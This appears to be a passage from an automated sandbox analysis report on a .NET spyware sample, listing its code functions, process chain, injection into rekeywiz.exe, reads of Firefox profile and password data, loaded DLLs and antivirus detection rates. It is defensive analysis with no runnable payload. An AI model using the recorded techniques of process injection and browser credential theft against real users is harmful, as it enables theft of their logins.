                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_049EFA81 NtSetContextThread,7_2_049EFA81
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_049EFACD NtSetContextThread,7_2_049EFACD
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016752A04_2_016752A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017275714_2_01727571
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017395C34_2_017395C3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170D5B04_2_0170D5B0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016614604_2_01661460
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172F43F4_2_0172F43F
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016617EC4_2_016617EC
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172F7B04_2_0172F7B0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016B56304_2_016B5630
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017216CC4_2_017216CC
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016799504_2_01679950
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168B9504_2_0168B950
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017059104_2_01705910
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016759904_2_01675990
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DD8004_2_016DD800
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016738E04_2_016738E0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172FB764_2_0172FB76
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016ADBF94_2_016ADBF9
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E5BF04_2_016E5BF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168FB804_2_0168FB80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E3A6C4_2_016E3A6C
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01727A464_2_01727A46
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172FA494_2_0172FA49
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0171DAC64_2_0171DAC6
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01711AA34_2_01711AA3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170DAAC4_2_0170DAAC
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01727D734_2_01727D73
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01721D5A4_2_01721D5A
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168FDC04_2_0168FDC0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E9C324_2_016E9C32
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172FCF24_2_0172FCF2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172FF094_2_0172FF09
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01633FD24_2_01633FD2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01633FD54_2_01633FD5
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172FFB14_2_0172FFB1
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01671F924_2_01671F92
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01679EB04_2_01679EB0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047824467_2_04782446
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047744207_2_04774420
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0477E4F67_2_0477E4F6
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D05357_2_046D0535
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047905917_2_04790591
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046EC6E07_2_046EC6E0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D07707_2_046D0770
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046F47507_2_046F4750
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046CC7C07_2_046CC7C0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047620007_2_04762000
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047581587_2_04758158
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046C01007_2_046C0100
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0476A1187_2_0476A118
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047881CC7_2_047881CC
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047901AA7_2_047901AA
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047921AE7_2_047921AE
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047502C07_2_047502C0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478A3527_2_0478A352
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046DE3F07_2_046DE3F0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047903E67_2_047903E6
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D0C007_2_046D0C00
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046C0CF27_2_046C0CF2
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0476CD1F7_2_0476CD1F
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046DAD007_2_046DAD00
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046CADE07_2_046CADE0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D8DC07_2_046D8DC0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046E8DBF7_2_046E8DBF
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478EE267_2_0478EE26
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478EEDB7_2_0478EEDB
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478CE937_2_0478CE93
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046E2E907_2_046E2E90
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04744F407_2_04744F40
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04772F307_2_04772F30
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04712F287_2_04712F28
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046F0F307_2_046F0F30
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046C2FC87_2_046C2FC8
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0474EFA07_2_0474EFA0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046DA8407_2_046DA840
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046FE8F07_2_046FE8F0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046B68B87_2_046B68B8
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046E69627_2_046E6962
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D29A07_2_046D29A0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046CEA807_2_046CEA80
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04786BD77_2_04786BD7
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478EB897_2_0478EB89
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046C14607_2_046C1460
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478F43F7_2_0478F43F
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047875717_2_04787571
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0476D5B07_2_0476D5B0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047816CC7_2_047816CC
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046C17EC7_2_046C17EC
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478F7B07_2_0478F7B0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047870E97_2_047870E9
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478F0E07_2_0478F0E0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0477F0CC7_2_0477F0CC
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0479B16B7_2_0479B16B
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046BF1727_2_046BF172
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0470516C7_2_0470516C
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046DB1B07_2_046DB1B0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047712ED7_2_047712ED
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046ED2F07_2_046ED2F0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046EB2C07_2_046EB2C0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D52A07_2_046D52A0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046BD34C7_2_046BD34C
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478132D7_2_0478132D
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04749C327_2_04749C32
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04787D737_2_04787D73
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04781D5A7_2_04781D5A
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046EFDC07_2_046EFDC0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D9EB07_2_046D9EB0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478FF097_2_0478FF09
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04693FD27_2_04693FD2
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04693FD57_2_04693FD5
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478FFB17_2_0478FFB1
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D1F927_2_046D1F92
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0473D8007_2_0473D800
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D38E07_2_046D38E0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D99507_2_046D9950
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046EB9507_2_046EB950
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_047659107_2_04765910
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046D59907_2_046D5990
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04743A6C7_2_04743A6C
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478FA497_2_0478FA49
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04787A467_2_04787A46
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0477DAC67_2_0477DAC6
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04771AA37_2_04771AA3
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0476DAAC7_2_0476DAAC
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0478FB767_2_0478FB76
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_04745BF07_2_04745BF0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0470DBF97_2_0470DBF9
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046EFB807_2_046EFB80
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006E1E907_2_006E1E90
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006DB0247_2_006DB024
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006DB0307_2_006DB030
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006D10AB7_2_006D10AB
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006D13787_2_006D1378
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006E55407_2_006E5540
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006E37507_2_006E3750
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006DCCE07_2_006DCCE0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006FBC807_2_006FBC80
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006DAEE07_2_006DAEE0
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006DCF007_2_006DCF00
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_049EE4237_2_049EE423
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_049EE7BC7_2_049EE7BC
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_049EE3047_2_049EE304
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_049ED8887_2_049ED888
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_049ECB237_2_049ECB23
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: String function: 016EF290 appears 98 times
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: String function: 016B7E54 appears 102 times
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: String function: 016DEA12 appears 76 times
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: String function: 016A5130 appears 53 times
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: String function: 0165B970 appears 210 times
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: String function: 04717E54 appears 93 times
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: String function: 0473EA12 appears 76 times
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: String function: 04705130 appears 53 times
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: String function: 046BB970 appears 210 times
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: String function: 0474F290 appears 98 times
                Source: hh01FRs81x.exe | Static PE information: invalid certificate
                Source: hh01FRs81x.exe, 00000000.00000002.946164021.00000000026F4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000000.00000000.873899011.00000000001B2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameIfzV.exe0 vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000000.00000002.957610210.0000000007C00000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000000.00000002.957046670.0000000005E00000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000000.00000002.953657489.0000000003621000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000000.00000002.953657489.0000000003621000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000000.00000002.945660626.00000000009FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000004.00000002.1316126705.000000000175D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000004.00000002.1315530161.0000000001108000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamerekeywiz.exej% vs hh01FRs81x.exe
                Source: hh01FRs81x.exe | Binary or memory string: OriginalFilenameIfzV.exe0 vs hh01FRs81x.exe
                Source: hh01FRs81x.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: hh01FRs81x.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, HIvUIGsYtoKEhgiL61.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, HIvUIGsYtoKEhgiL61.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, sHng7ndrKLAUMwNucF.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, sHng7ndrKLAUMwNucF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, sHng7ndrKLAUMwNucF.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/2@15/13
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hh01FRs81x.exe.log
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Mutant created: NULL
                Source: C:\Windows\SysWOW64\rekeywiz.exe | File created: C:\Users\user\AppData\Local\Temp\4Fr641e5
                Source: hh01FRs81x.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: rekeywiz.exe, 00000007.00000003.1504118666.000000000085F000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000003.1504118666.000000000083E000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3334449717.0000000000869000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3334449717.000000000085F000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3334449717.000000000088D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: hh01FRs81x.exe | ReversingLabs: Detection: 71%
                Source: hh01FRs81x.exe | Virustotal: Detection: 70%
                Source: unknown | Process created: C:\Users\user\Desktop\hh01FRs81x.exe "C:\Users\user\Desktop\hh01FRs81x.exe"
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Process created: C:\Users\user\Desktop\hh01FRs81x.exe "C:\Users\user\Desktop\hh01FRs81x.exe"
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Process created: C:\Users\user\Desktop\hh01FRs81x.exe "C:\Users\user\Desktop\hh01FRs81x.exe"
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exe | Process created: C:\Windows\SysWOW64\rekeywiz.exe "C:\Windows\SysWOW64\rekeywiz.exe"
                Source: C:\Windows\SysWOW64\rekeywiz.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: netfxperf.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: pdh.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: wtsapi32.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: bitsperf.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: bitsproxy.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: esentprf.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: secur32.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: perfts.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: winsta.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: utildll.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: tdh.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: winsta.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: samcli.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: msdtcuiu.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: atl.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: msdtcprx.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: mtxclu.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: clusapi.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: resutils.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: clusapi.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: resutils.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: msdtcprx.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: ktmw32.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: wkscli.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: cscapi.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: msscntrs.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: perfdisk.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: wmiclnt.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: perfnet.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: browcli.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: perfos.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: perfproc.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: sysmain.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: rasctrs.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: rasman.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: tapiperf.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: tapi32.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: perfctrs.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: usbperf.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: tquery.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: cryptdll.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\hh01FRs81x.exe | Section loaded: iconcodecservice.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: efsadu.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: dsrole.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: efsutil.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: cryptui.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: mfc42u.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: logoncli.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: credui.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: feclient.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\rekeywiz.exe Section loaded: sspicli.dll
